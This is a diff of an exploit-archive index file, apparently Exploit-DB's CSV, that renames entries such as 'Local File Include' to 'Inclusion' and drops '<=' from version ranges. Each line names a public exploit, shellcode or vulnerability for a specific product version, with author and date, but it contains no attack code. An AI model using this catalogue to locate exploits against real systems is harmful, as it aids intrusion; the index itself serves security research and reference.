38348,platforms/windows/dos/38348.txt,"Adobe Flash - No Checks on Vector. Capacity Field",2015-09-28,"Google Security Research",windows,dos,0 @@ -34652,7 +34652,7 @@ id,file,description,date,author,platform,type,port 38402,platforms/multiple/remote/38402.rb,"Zemra Botnet CnC Web Panel Remote Code Execution",2015-10-05,Metasploit,multiple,remote,0 38401,platforms/windows/remote/38401.rb,"Kaseya Virtual System Administrator (VSA) - uploader.aspx Arbitrary File Upload",2015-10-05,Metasploit,windows,remote,0 38362,platforms/windows/local/38362.py,"MakeSFX.exe 1.44 - Stack Buffer Overflow",2015-09-30,hyp3rlinx,windows,local,0 -38363,platforms/php/webapps/38363.txt,"File Manager HTML Injection and Local File Include Vulnerabilities",2013-02-23,"Benjamin Kunz Mejri",php,webapps,0 +38363,platforms/php/webapps/38363.txt,"File Manager HTML Injection and Local File Inclusion Vulnerabilities",2013-02-23,"Benjamin Kunz Mejri",php,webapps,0 38364,platforms/multiple/dos/38364.txt,"Varnish Cache Multiple Denial of Service Vulnerabilities",2013-03-05,tytusromekiatomek,multiple,dos,0 38365,platforms/linux/dos/38365.txt,"Squid 'httpMakeVaryMark()' Function Remote Denial of Service",2013-03-05,tytusromekiatomek,linux,dos,0 38366,platforms/multiple/webapps/38366.py,"Verax NMS Multiple Method Authentication Bypass",2013-02-06,"Andrew Brooks",multiple,webapps,0 @@ -34683,7 +34683,7 @@ id,file,description,date,author,platform,type,port 38392,platforms/linux/dos/38392.txt,"MySQL and MariaDB Geometry Query Denial Of Service",2013-03-07,"Alyssa Milburn",linux,dos,0 38393,platforms/php/webapps/38393.html,"WordPress Occasions Plugin Cross Site Request Forgery",2013-03-19,m3tamantra,php,webapps,0 38394,platforms/windows/remote/38394.py,"BlazeVideo HDTV Player Standard '.PLF' File Remote Buffer Overflow",2013-03-19,metacom,windows,remote,0 -38395,platforms/jsp/webapps/38395.txt,"ManageEngine ServiceDesk Plus <= 9.1 build 9110 - Path Traversal",2015-10-05,xistence,jsp,webapps,8080 +38395,platforms/jsp/webapps/38395.txt,"ManageEngine ServiceDesk Plus 9.1 build 9110 - Path Traversal",2015-10-05,xistence,jsp,webapps,8080 38536,platforms/hardware/remote/38536.txt,"Barracuda SSL VPN 680 - 'returnTo' Parameter Open Redirection",2013-05-27,"Chokri Ben Achor",hardware,remote,0 38537,platforms/php/webapps/38537.txt,"WordPress ADIF Log Search Widget Plugin 'logbook_search.php' Cross Site Scripting",2013-05-27,k3170makan,php,webapps,0 38399,platforms/windows/dos/38399.py,"LanSpy 2.0.0.155 - Buffer Overflow",2015-10-05,hyp3rlinx,windows,dos,0 @@ -34691,7 +34691,7 @@ id,file,description,date,author,platform,type,port 38403,platforms/win_x86/local/38403.txt,"Truecrypt 7 / VeraCrypt 1.13 - Drive Letter Symbolic Link Creation Privilege Escalation",2015-10-05,"Google Security Research",win_x86,local,0 38404,platforms/windows/dos/38404.py,"LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow",2015-10-06,hyp3rlinx,windows,dos,0 38405,platforms/windows/dos/38405.py,"Last PassBroker 3.2.16 - Stack-Based Buffer Overflow",2015-10-06,Un_N0n,windows,dos,0 -38406,platforms/php/webapps/38406.txt,"PHP-Fusion <= v7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",php,webapps,0 +38406,platforms/php/webapps/38406.txt,"PHP-Fusion v7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",php,webapps,0 38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - RCE Through File Upload Filter Bypass",2015-10-06,"Raffaele Forte",php,webapps,0 38408,platforms/php/webapps/38408.txt,"Jaow CMS 'add_ons' Parameter Cross Site Scripting",2013-03-23,Metropolis,php,webapps,0 38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N Unauthenticated Config Download",2015-10-06,"Todor Donev",hardware,webapps,0 @@ -34734,7 +34734,7 @@ id,file,description,date,author,platform,type,port 38446,platforms/php/webapps/38446.html,"Dream CMS 2.3.0 - CSRF Add Extension And File Upload PHP Code Execution",2015-10-11,LiquidWorm,php,webapps,0 38448,platforms/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - File Path Traversal",2015-10-13,"Karn Ganeshen",hardware,webapps,0 38449,platforms/hardware/webapps/38449.txt,"Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",hardware,webapps,0 -38450,platforms/php/webapps/38450.txt,"Kerio Control <= 8.6.1 - Multiple Vulnerabilities",2015-10-13,"Raschin Tavakoli",php,webapps,0 +38450,platforms/php/webapps/38450.txt,"Kerio Control 8.6.1 - Multiple Vulnerabilities",2015-10-13,"Raschin Tavakoli",php,webapps,0 38454,platforms/multiple/remote/38454.py,"Linux/MIPS Kernel 2.6.36 - 'NetUSB' Remote Code Execution Exploit",2015-10-14,blasty,multiple,remote,0 38455,platforms/hardware/webapps/38455.txt,"ZyXEL PMG5318-B20A - OS Command Injection",2015-10-14,"Karn Ganeshen",hardware,webapps,0 38456,platforms/windows/local/38456.py,"Boxoft WAV to MP3 Converter 1.1 - SEH Buffer Overflow",2015-10-14,ArminCyber,windows,local,0 @@ -34750,19 +34750,19 @@ id,file,description,date,author,platform,type,port 38462,platforms/java/webapps/38462.txt,"Hero Framework /users/forgot_password error Parameter XSS",2013-04-10,"High-Tech Bridge",java,webapps,0 38463,platforms/multiple/webapps/38463.txt,"Aibolit Information Disclosure",2013-04-13,MustLive,multiple,webapps,0 38464,platforms/hardware/remote/38464.txt,"Cisco Linksys EA2700 Router Multiple Security Vulnerabilities",2013-04-15,"Phil Purviance",hardware,remote,0 -38465,platforms/linux/dos/38465.txt,"Linux Kernel <= 3.2.1 - Tracing Mutiple Local Denial of Service Vulnerabilities",2013-04-15,anonymous,linux,dos,0 +38465,platforms/linux/dos/38465.txt,"Linux Kernel 3.2.1 - Tracing Mutiple Local Denial of Service Vulnerabilities",2013-04-15,anonymous,linux,dos,0 38467,platforms/windows/local/38467.py,"AdobeWorkgroupHelper 2.8.3.3 - Stack Based Buffer Overflow",2015-10-15,hyp3rlinx,windows,local,0 38469,platforms/lin_x86-64/shellcode/38469.c,"Linux/x86-64 - Bindshell 31173 port with Password shellcode (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode,0 38470,platforms/hardware/webapps/38470.txt,"netis RealTek Wireless Router / ADSL Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",hardware,webapps,0 38471,platforms/hardware/webapps/38471.txt,"PROLiNK H5004NK ADSL Wireless Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",hardware,webapps,0 38472,platforms/windows/local/38472.py,"Blat.exe 2.7.6 SMTP / NNTP Mailer - Buffer Overflow",2015-10-15,hyp3rlinx,windows,local,0 -38473,platforms/linux/local/38473.py,"Linux <= 3.17 - noexec File Permission Bypass (Python ctypes and memfd_create)",2015-10-15,soyer,linux,local,0 +38473,platforms/linux/local/38473.py,"Linux 3.17 - noexec File Permission Bypass (Python ctypes and memfd_create)",2015-10-15,soyer,linux,local,0 38474,platforms/windows/local/38474.txt,"Windows 10 Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111)",2015-10-15,"Google Security Research",windows,local,0 38478,platforms/php/webapps/38478.txt,"Sosci Survey Multiple Security Vulnerabilities",2013-04-17,"T. Lazauninkas",php,webapps,0 38479,platforms/asp/webapps/38479.txt,"Matrix42 Service Store 'default.aspx' Cross Site Scripting",2013-03-06,43zsec,asp,webapps,0 -38480,platforms/php/webapps/38480.txt,"Fork CMS 'file' Parameter Local File Include",2013-04-18,"Rafay Baloch",php,webapps,0 +38480,platforms/php/webapps/38480.txt,"Fork CMS 'file' Parameter Local File Inclusion",2013-04-18,"Rafay Baloch",php,webapps,0 38481,platforms/hardware/remote/38481.html,"D-Link DIR-865L Cross Site Request Forgery",2013-04-19,"Jacob Holcomb",hardware,remote,0 -38482,platforms/php/webapps/38482.txt,"Crafty Syntax Live Help <= 3.1.2 Remote File Include and Path Disclosure Vulnerabilities",2013-04-19,ITTIHACK,php,webapps,0 +38482,platforms/php/webapps/38482.txt,"Crafty Syntax Live Help 3.1.2 Remote File Inclusion and Path Disclosure Vulnerabilities",2013-04-19,ITTIHACK,php,webapps,0 38483,platforms/hardware/dos/38483.txt,"TP-LINK TL-WR741N and TL-WR741ND Routers Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,hardware,dos,0 38484,platforms/php/webapps/38484.rb,"WordPress Ajax Load More Plugin < 2.8.2 - File Upload",2015-10-18,PizzaHatHacker,php,webapps,0 38485,platforms/windows/dos/38485.py,"VLC 2.2.1 libvlccore - (.mp3) Stack Overflow",2015-10-18,"Andrea Sindoni",windows,dos,0 @@ -34793,7 +34793,7 @@ id,file,description,date,author,platform,type,port 38510,platforms/php/webapps/38510.txt,"WordPress Securimage-WP Plugin 'siwp_test.php' Cross Site Scripting",2013-05-11,"Gjoko Krstic",php,webapps,0 38511,platforms/php/webapps/38511.txt,"Gallery Server Pro Arbitrary File Upload",2013-05-14,"Drew Calcott",php,webapps,0 38512,platforms/windows/remote/38512.php,"The World Browser 3.0 Final - Remote Code Execution",2015-10-22,"Ehsan Noreddini",windows,remote,0 -38513,platforms/windows/remote/38513.txt,"TeamSpeak Client <= 3.0.18.1 - RFI to RCE Exploit",2015-10-22,Scurippio,windows,remote,0 +38513,platforms/windows/remote/38513.txt,"TeamSpeak Client 3.0.18.1 - RFI to RCE Exploit",2015-10-22,Scurippio,windows,remote,0 38514,platforms/hardware/webapps/38514.py,"Beckhoff CX9020 CPU Module - Remote Code Execution Exploit",2015-10-22,Photubias,hardware,webapps,0 38515,platforms/php/webapps/38515.txt,"WordPress wp-FileManager Plugin 'path' Parameter Arbitrary File Download",2013-05-15,ByEge,php,webapps,0 38516,platforms/php/webapps/38516.txt,"Open Flash Chart 'get-data' Parameter Cross-Site Scripting",2013-05-14,"Deepankar Arora",php,webapps,0 @@ -34834,11 +34834,11 @@ id,file,description,date,author,platform,type,port 38556,platforms/android/dos/38556.txt,"Samsung - seiren Kernel Driver Buffer Overflow",2015-10-28,"Google Security Research",android,dos,0 38557,platforms/android/dos/38557.txt,"Samsung fimg2d FIMG2D_BITBLT_BLIT ioctl Concurrency Flaw",2015-10-28,"Google Security Research",android,dos,0 38558,platforms/android/dos/38558.txt,"Samsung SecEmailComposer QUICK_REPLY_BACKGROUND Permissions Weakness",2015-10-28,"Google Security Research",android,dos,0 -38559,platforms/linux/local/38559.txt,"Linux Kernel <= 3.3.5 - 'b43' Wireless Driver Local Privilege Escalation",2013-06-07,"Kees Cook",linux,local,0 +38559,platforms/linux/local/38559.txt,"Linux Kernel 3.3.5 - 'b43' Wireless Driver Local Privilege Escalation",2013-06-07,"Kees Cook",linux,local,0 38560,platforms/php/webapps/38560.txt,"Caucho Resin /resin-admin/ URI XSS",2013-06-07,"Gjoko Krstic",php,webapps,0 38561,platforms/php/webapps/38561.txt,"Caucho Resin index.php logout Parameter XSS",2013-06-07,"Gjoko Krstic",php,webapps,0 38562,platforms/php/webapps/38562.txt,"HP Insight Diagnostics Remote Code Injection",2013-06-10,"Markus Wulftange",php,webapps,0 -38563,platforms/php/webapps/38563.txt,"HP Insight Diagnostics Local File Include",2013-06-10,"Markus Wulftange",php,webapps,0 +38563,platforms/php/webapps/38563.txt,"HP Insight Diagnostics Local File Inclusion",2013-06-10,"Markus Wulftange",php,webapps,0 38564,platforms/windows/dos/38564.py,"Sam Spade 1.14 - Scan From IP Address Field SEH Overflow Crash PoC",2015-10-29,"Luis Martínez",windows,dos,0 38565,platforms/php/webapps/38565.txt,"Joomla JNews (com_jnews) Component 8.5.1 - SQL Injection",2015-10-29,"Omer Ramić",php,webapps,80 38566,platforms/hardware/dos/38566.py,"NetUSB - Kernel Stack Buffer Overflow",2015-10-29,"Adrián Ruiz Bermudo",hardware,dos,0 @@ -34847,7 +34847,7 @@ id,file,description,date,author,platform,type,port 38569,platforms/php/webapps/38569.txt,"Lokboard 'index_4.php' PHP Code Injection",2013-06-10,"CWH Underground",php,webapps,0 38570,platforms/php/webapps/38570.txt,"ScriptCase 'scelta_categoria.php' SQL Injection",2013-06-10,"Hossein Hezami",php,webapps,0 38571,platforms/php/webapps/38571.txt,"mkCMS 'index.php' Arbitrary PHP Code Execution",2013-06-11,"CWH Underground",php,webapps,0 -38573,platforms/php/webapps/38573.txt,"eBay Magento <= 1.9.2.1 - PHP FPM XML eXternal Entity Injection",2015-10-30,"Dawid Golunski",php,webapps,0 +38573,platforms/php/webapps/38573.txt,"eBay Magento 1.9.2.1 - PHP FPM XML eXternal Entity Injection",2015-10-30,"Dawid Golunski",php,webapps,0 38574,platforms/php/webapps/38574.html,"PHP Server Monitor 3.1.1- CSRF Privilege Escalation",2015-10-30,hyp3rlinx,php,webapps,0 38575,platforms/hardware/webapps/38575.txt,"Hitron Router CGN3ACSMR 4.5.8.16 - Arbitrary Code Execution",2015-10-30,"Dolev Farhi",hardware,webapps,0 38576,platforms/aix/local/38576.sh,"AIX 7.1 - lquerylv Local Privilege Escalation",2015-10-30,"S2 Crew",aix,local,0 @@ -34863,13 +34863,13 @@ id,file,description,date,author,platform,type,port 38586,platforms/android/remote/38586.txt,"TaxiMonger for Android 'name' Parameter HTML Injection",2013-06-15,"Ismail Kaleem",android,remote,0 38587,platforms/multiple/remote/38587.txt,"Monkey HTTP Daemon Mandril Security Plugin Security Bypass",2013-06-14,felipensp,multiple,remote,0 38588,platforms/php/webapps/38588.php,"bloofoxCMS 'index.php' Arbitrary File Upload",2013-06-17,"CWH Underground",php,webapps,0 -38589,platforms/linux/dos/38589.c,"Linux Kernel <= 3.0.5 - 'test_root()' Function Local Denial of Service",2013-06-05,"Jonathan Salwan",linux,dos,0 +38589,platforms/linux/dos/38589.c,"Linux Kernel 3.0.5 - 'test_root()' Function Local Denial of Service",2013-06-05,"Jonathan Salwan",linux,dos,0 38590,platforms/php/webapps/38590.txt,"et-chat Privilege Escalation and Arbitrary Shell Upload Vulnerabilities",2013-06-18,MR.XpR,php,webapps,0 38591,platforms/hardware/remote/38591.py,"TP-LINK TL-PS110U Print Server 'tplink-enum.py' Security Bypass",2013-06-19,SANTHO,hardware,remote,0 38592,platforms/php/webapps/38592.php,"Joomla! RokDownloads Component Arbitrary File Upload",2013-06-19,Am!r,php,webapps,0 38593,platforms/cgi/webapps/38593.txt,"FtpLocate HTML Injection",2013-06-24,Chako,cgi,webapps,0 38594,platforms/php/webapps/38594.txt,"Barnraiser Prairie 'get_file.php' Directory Traversal",2013-06-25,prairie,php,webapps,0 -38595,platforms/multiple/dos/38595.txt,"Oracle VM VirtualBox <= 4.0 - 'tracepath' Local Denial of Service",2013-06-26,"Thomas Dreibholz",multiple,dos,0 +38595,platforms/multiple/dos/38595.txt,"Oracle VM VirtualBox 4.0 - 'tracepath' Local Denial of Service",2013-06-26,"Thomas Dreibholz",multiple,dos,0 38596,platforms/php/webapps/38596.txt,"Xaraya Multiple Cross Site Scripting Vulnerabilities",2013-06-26,"High-Tech Bridge",php,webapps,0 38597,platforms/multiple/remote/38597.txt,"Motion Multiple Remote Security Vulnerabilities",2013-06-26,xistence,multiple,remote,0 38598,platforms/php/webapps/38598.txt,"ZamFoo 'date' Parameter Remote Command Injection",2013-06-15,localhost.re,php,webapps,0 @@ -34878,7 +34878,7 @@ id,file,description,date,author,platform,type,port 38601,platforms/windows/local/38601.py,"Sam Spade 1.14 - (Scan Addresses) Buffer Overflow Exploit",2015-11-02,VIKRAMADITYA,windows,local,0 38602,platforms/windows/webapps/38602.txt,"actiTIME 2015.2 - Multiple Vulnerabilities",2015-11-02,LiquidWorm,windows,webapps,0 38603,platforms/windows/local/38603.py,"TCPing 2.1.0 - Buffer Overflow",2015-11-02,hyp3rlinx,windows,local,0 -38604,platforms/hardware/remote/38604.txt,"Mobile USB Drive HD Multiple Local File Include and Arbitrary File Upload Vulnerabilities",2012-06-28,"Benjamin Kunz Mejri",hardware,remote,0 +38604,platforms/hardware/remote/38604.txt,"Mobile USB Drive HD Multiple Local File Inclusion and Arbitrary File Upload Vulnerabilities",2012-06-28,"Benjamin Kunz Mejri",hardware,remote,0 38605,platforms/php/webapps/38605.txt,"Nameko 'nameko.php' Cross Site Scripting",2013-06-29,"Andrea Menin",php,webapps,0 38606,platforms/php/webapps/38606.txt,"WordPress WP Private Messages Plugin - 'msgid' Parameter SQL Injection",2013-06-29,"IeDb ir",php,webapps,0 38607,platforms/php/webapps/38607.txt,"Atomy Maxsite 'index.php' Arbitrary File Upload",2013-06-30,Iranian_Dark_Coders_Team,php,webapps,0 @@ -34895,7 +34895,7 @@ id,file,description,date,author,platform,type,port 38618,platforms/windows/dos/38618.txt,"Python 3.3 < 3.5 product_setstate() Function - Out-of-bounds Read",2015-11-03,"John Leitch",windows,dos,0 38631,platforms/windows/local/38631.txt,"McAfee Data Loss Prevention Multiple Information Disclosure Vulnerabilities",2013-06-24,"Jamie Ooi",windows,local,0 38632,platforms/hardware/remote/38632.txt,"Multiple Zoom Telephonics Devices Multiple Security Vulnerabilities",2013-07-09,"Kyle Lovett",hardware,remote,0 -38630,platforms/php/webapps/38630.html,"phpVibe Information Disclosure and Remote File Include Vulnerabilities",2013-07-06,indoushka,php,webapps,0 +38630,platforms/php/webapps/38630.html,"phpVibe Information Disclosure and Remote File Inclusion Vulnerabilities",2013-07-06,indoushka,php,webapps,0 38620,platforms/linux/dos/38620.txt,"FreeType 2.6.1 TrueType tt_cmap14_validate Parsing Heap-Based Out-of-Bounds Reads",2015-11-04,"Google Security Research",linux,dos,0 38621,platforms/php/webapps/38621.txt,"WordPress Xorbin Digital Flash Clock 'widgetUrl' Parameter Cross Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0 38622,platforms/linux/dos/38622.txt,"libvirt 'virConnectListAllInterfaces' Method Denial of Service",2013-07-01,"Daniel P. Berrange",linux,dos,0 @@ -34919,12 +34919,12 @@ id,file,description,date,author,platform,type,port 38643,platforms/php/webapps/38643.txt,"WordPress Pie Register Plugin 'wp-login.php' Multiple Cross Site Scripting Vulnerabilities",2013-07-12,gravitylover,php,webapps,0 38646,platforms/jsp/webapps/38646.txt,"NXFilter 3.0.3 - Multiple XSS Vulnerabilities",2015-11-06,hyp3rlinx,jsp,webapps,0 38648,platforms/php/webapps/38648.txt,"WordPress My Calendar Plugin 2.4.10 - Multiple Vulnerabilities",2015-11-06,Mysticism,php,webapps,0 -38649,platforms/php/webapps/38649.txt,"Google AdWords API PHP client library <= 6.2.0 - Arbitrary PHP Code Execution",2015-11-07,"Dawid Golunski",php,webapps,0 +38649,platforms/php/webapps/38649.txt,"Google AdWords API PHP client library 6.2.0 - Arbitrary PHP Code Execution",2015-11-07,"Dawid Golunski",php,webapps,0 38650,platforms/windows/dos/38650.py,"QNap QVR Client 5.1.0.11290 - Crash PoC",2015-11-07,"Luis Martínez",windows,dos,0 -38651,platforms/php/webapps/38651.txt,"eBay Magento CE <= 1.9.2.1 - Unrestricted Cron Script (Potential Code Execution / DoS)",2015-11-07,"Dawid Golunski",php,webapps,0 -38652,platforms/php/webapps/38652.txt,"Google AdWords <= 6.2.0 API client libraries - XML eXternal Entity Injection (XXE)",2015-11-07,"Dawid Golunski",php,webapps,0 +38651,platforms/php/webapps/38651.txt,"eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Potential Code Execution / DoS)",2015-11-07,"Dawid Golunski",php,webapps,0 +38652,platforms/php/webapps/38652.txt,"Google AdWords 6.2.0 API client libraries - XML eXternal Entity Injection (XXE)",2015-11-07,"Dawid Golunski",php,webapps,0 38653,platforms/asp/webapps/38653.txt,"Corda Highwire 'Highwire.ashx' File Path Disclosure",2013-07-12,"Adam Willard",asp,webapps,0 -38654,platforms/php/webapps/38654.txt,"OpenEMR <= 4.1 - 'note' Parameter HTML Injection",2013-07-12,"Nate Drier",php,webapps,0 +38654,platforms/php/webapps/38654.txt,"OpenEMR 4.1 - 'note' Parameter HTML Injection",2013-07-12,"Nate Drier",php,webapps,0 38655,platforms/asp/webapps/38655.txt,"Corda .NET Redirector 'redirector.corda' Cross Site Scripting",2013-07-12,"Adam Willard",asp,webapps,0 38656,platforms/php/webapps/38656.html,"PrestaShop Multiple Cross Site Request Forgery Vulnerabilities",2013-07-11,"EntPro Cyber Security Research Group",php,webapps,0 38657,platforms/hardware/webapps/38657.html,"Arris TG1682G Modem - Stored XSS",2015-11-09,Nu11By73,hardware,webapps,0 @@ -34936,7 +34936,7 @@ id,file,description,date,author,platform,type,port 38663,platforms/hardware/remote/38663.txt,"Huawei HG630a and HG630a-50 - Default SSH Admin Password on ADSL Modems",2015-11-10,"Murat Sahin",hardware,remote,0 38664,platforms/java/webapps/38664.py,"Jenkins 1.633 - Unauthenticated Credential Recovery",2015-11-10,"The Repo",java,webapps,0 38665,platforms/php/webapps/38665.txt,"YESWIKI 0.2 - Path Traversal",2015-11-10,HaHwul,php,webapps,0 -38666,platforms/multiple/remote/38666.txt,"Apache Struts <= 2.2.3 Multiple Open Redirection Vulnerabilities",2013-07-16,"Takeshi Terada",multiple,remote,0 +38666,platforms/multiple/remote/38666.txt,"Apache Struts 2.2.3 Multiple Open Redirection Vulnerabilities",2013-07-16,"Takeshi Terada",multiple,remote,0 38667,platforms/windows/remote/38667.py,"ReadyMedia Remote Heap Buffer Overflow",2013-07-15,"Zachary Cutlip",windows,remote,0 38668,platforms/windows/local/38668.c,"Cisco WebEx One-Click Client Password Encryption Information Disclosure",2013-07-09,"Brad Antoniewicz",windows,local,0 38669,platforms/multiple/remote/38669.txt,"MongoDB 'conn' Mongo Object Remote Code Execution",2013-06-04,"SCRT Security",multiple,remote,0 @@ -34947,7 +34947,7 @@ id,file,description,date,author,platform,type,port 38674,platforms/php/webapps/38674.txt,"WordPress FlagEm Plugin 'cID' Parameter Cross Site Scripting",2013-07-22,"IeDb ir",php,webapps,0 38675,platforms/php/webapps/38675.html,"Magnolia CMS Multiple Cross Site Scripting Vulnerabilities",2013-07-24,"High-Tech Bridge",php,webapps,0 38676,platforms/php/webapps/38676.txt,"WordPress Duplicator Plugin Cross Site Scripting",2013-07-24,"High-Tech Bridge",php,webapps,0 -38677,platforms/php/webapps/38677.txt,"VBulletin <= 4.0.2 - 'update_order' Parameter SQL Injection",2013-07-24,n3tw0rk,php,webapps,0 +38677,platforms/php/webapps/38677.txt,"VBulletin 4.0.2 - 'update_order' Parameter SQL Injection",2013-07-24,n3tw0rk,php,webapps,0 38678,platforms/php/webapps/38678.txt,"WordPress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection",2015-11-11,"Kacper Szurek",php,webapps,0 38679,platforms/php/webapps/38679.txt,"AlienVault Open Source SIEM (OSSIM) - Multiple Cross Site Scripting Vulnerabilities",2013-07-25,xistence,php,webapps,0 38680,platforms/linux/remote/38680.html,"xmonad XMonad.Hooks.DynamicLog Module Multiple Remote Command Injection Vulnerabilities",2013-07-26,"Joachim Breitner",linux,remote,0 @@ -34963,9 +34963,9 @@ id,file,description,date,author,platform,type,port 38692,platforms/hardware/remote/38692.txt,"AlgoSec Firewall Analyzer Cross Site Scripting",2013-08-16,"Asheesh kumar Mani Tripathi",hardware,remote,0 38693,platforms/php/webapps/38693.txt,"Advanced Guestbook 'addentry.php' Arbitrary Shell Upload",2013-08-08,"Ashiyane Digital Security Team",php,webapps,0 38694,platforms/windows/remote/38694.txt,"HTC Sync Manager Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2013-08-11,Iranian_Dark_Coders_Team,windows,remote,0 -38695,platforms/php/webapps/38695.txt,"CakePHP AssetDispatcher Class Local File Include",2013-08-13,"Takeshi Terada",php,webapps,0 +38695,platforms/php/webapps/38695.txt,"CakePHP AssetDispatcher Class Local File Inclusion",2013-08-13,"Takeshi Terada",php,webapps,0 38696,platforms/asp/webapps/38696.txt,"DotNetNuke 6.1.x Cross Site Scripting",2013-08-13,"Sajjad Pourali",asp,webapps,0 -38697,platforms/php/webapps/38697.txt,"ACal 2.2.6 'view' Parameter Local File Include",2013-08-15,ICheer_No0M,php,webapps,0 +38697,platforms/php/webapps/38697.txt,"ACal 2.2.6 'view' Parameter Local File Inclusion",2013-08-15,ICheer_No0M,php,webapps,0 38698,platforms/php/webapps/38698.html,"CF Image Host 1.65 - CSRF",2015-11-16,hyp3rlinx,php,webapps,0 38699,platforms/php/webapps/38699.txt,"CF Image Host 1.65 - PHP Command Injection",2015-11-16,hyp3rlinx,php,webapps,0 38700,platforms/windows/local/38700.pl,"TECO SG2 LAD Client 3.51 - .gen SEH Overwrite Buffer Overflow Exploit",2015-11-16,LiquidWorm,windows,local,0 @@ -35033,7 +35033,7 @@ id,file,description,date,author,platform,type,port 38763,platforms/lin_x86/dos/38763.txt,"Chrome - open-vcdiff OOB Read in Browser Process Integer Overflow",2015-11-19,"Google Security Research",lin_x86,dos,0 38764,platforms/hardware/remote/38764.rb,"F5 iControl iCall::Script Root Command Execution",2015-11-19,Metasploit,hardware,remote,443 38765,platforms/php/webapps/38765.txt,"Horde Groupware 5.2.10 - CSRF",2015-11-19,"High-Tech Bridge SA",php,webapps,80 -38766,platforms/multiple/remote/38766.java,"Mozilla Firefox <= 9.0.1 Same Origin Policy Security Bypass",2013-09-17,"Takeshi Terada",multiple,remote,0 +38766,platforms/multiple/remote/38766.java,"Mozilla Firefox 9.0.1 Same Origin Policy Security Bypass",2013-09-17,"Takeshi Terada",multiple,remote,0 38767,platforms/php/webapps/38767.txt,"WordPress RokIntroScroller Plugin 'thumb.php' Multiple Security Vulnerabilities",2013-09-19,MustLive,php,webapps,0 38768,platforms/php/webapps/38768.txt,"WordPress RokMicroNews Plugin 'thumb.php' Multiple Security Vulnerabilities",2013-09-19,MustLive,php,webapps,0 38769,platforms/php/webapps/38769.txt,"Monstra CMS 'login' Parameter SQL Injection",2013-09-20,linc0ln.dll,php,webapps,0 @@ -35072,7 +35072,7 @@ id,file,description,date,author,platform,type,port 38804,platforms/hardware/remote/38804.py,"Multiple Level One Enterprise Access Point Devices 'backupCfg.cgi' Security Bypass",2013-10-15,"Richard Weinberger",hardware,remote,0 38805,platforms/multiple/remote/38805.txt,"SAP Sybase Adaptive Server Enterprise XML External Entity Information Disclosure",2015-11-25,"Igor Bulatenko",multiple,remote,0 38806,platforms/cgi/webapps/38806.txt,"Bugzilla 'editflagtypes.cgi' Multiple Cross Site Scripting Vulnerabilities",2013-10-09,"Mateusz Goik",cgi,webapps,0 -38807,platforms/cgi/webapps/38807.txt,"Bugzilla <= 4.2 Tabular Reports Unspecified XSS",2013-10-09,"Mateusz Goik",cgi,webapps,0 +38807,platforms/cgi/webapps/38807.txt,"Bugzilla 4.2 Tabular Reports Unspecified XSS",2013-10-09,"Mateusz Goik",cgi,webapps,0 38808,platforms/php/webapps/38808.txt,"WordPress WP-Realty Plugin 'listing_id' Parameter SQL Injection",2013-10-08,Napsterakos,php,webapps,0 38809,platforms/php/remote/38809.php,"PHP Point Of Sale 'ofc_upload_image.php' Remote Code Execution",2013-10-18,Gabby,php,remote,0 38810,platforms/hardware/remote/38810.py,"Multiple Vendors 'RuntimeDiagnosticPing()' Stack Buffer Overflow",2013-10-14,"Craig Heffner",hardware,remote,0 @@ -35082,7 +35082,7 @@ id,file,description,date,author,platform,type,port 38814,platforms/php/webapps/38814.php,"Joomla! Maian15 Component 'name' Parameter Arbitrary Shell Upload",2013-10-20,SultanHaikal,php,webapps,0 38815,platforms/lin_x86-64/shellcode/38815.c,"Linux/x86-64 - Polymorphic execve Shellcode (31 bytes)",2015-11-25,d4sh&r,lin_x86-64,shellcode,0 38816,platforms/jsp/webapps/38816.html,"JReport 'dealSchedules.jsp' Cross-Site Request Forgery",2013-10-25,"Poonam Singh",jsp,webapps,0 -38817,platforms/linux/local/38817.txt,"Poppler <= 0.14.3 - '/utils/pdfseparate.cc' Local Format String",2013-10-26,"Daniel Kahn Gillmor",linux,local,0 +38817,platforms/linux/local/38817.txt,"Poppler 0.14.3 - '/utils/pdfseparate.cc' Local Format String",2013-10-26,"Daniel Kahn Gillmor",linux,local,0 38818,platforms/multiple/remote/38818.xml,"Openbravo ERP - XML External Entity Information Disclosure",2013-10-30,"Tod Beardsley",multiple,remote,0 38819,platforms/php/webapps/38819.txt,"Course Registration Management System Cross Site Scripting and SQL Injection Vulnerabilities",2013-10-21,"Omar Kurt",php,webapps,0 38820,platforms/php/webapps/38820.php,"WordPress This Way Theme 'upload_settings_image.php' Arbitrary File Upload",2013-11-01,Bet0,php,webapps,0 @@ -35090,7 +35090,7 @@ id,file,description,date,author,platform,type,port 38822,platforms/windows/webapps/38822.rb,"Sysaid Helpdesk Software 14.4.32 b25 - SQL Injection (Metasploit)",2015-11-28,hland,windows,webapps,8080 38831,platforms/php/webapps/38831.txt,"HumHub 0.11.2 / 0.20.0-beta.2 - SQL Injection",2015-11-30,"LSE Leading Security Experts GmbH",php,webapps,80 38825,platforms/multiple/remote/38825.xml,"IBM Cognos Business Intelligence XML External Entity Information Disclosure",2013-10-11,IBM,multiple,remote,0 -38826,platforms/linux/remote/38826.py,"Linux Kernel <= 3.0.5 - 'ath9k_htc_set_bssid_mask()' Function Information Disclosure",2013-12-10,"Mathy Vanhoef",linux,remote,0 +38826,platforms/linux/remote/38826.py,"Linux Kernel 3.0.5 - 'ath9k_htc_set_bssid_mask()' Function Information Disclosure",2013-12-10,"Mathy Vanhoef",linux,remote,0 38827,platforms/php/remote/38827.txt,"Nagios XI 'tfPassword' Parameter SQL Injection",2013-12-13,"Denis Andzakovic",php,remote,0 38828,platforms/php/webapps/38828.php,"Limonade framework 'limonade.php' Local File 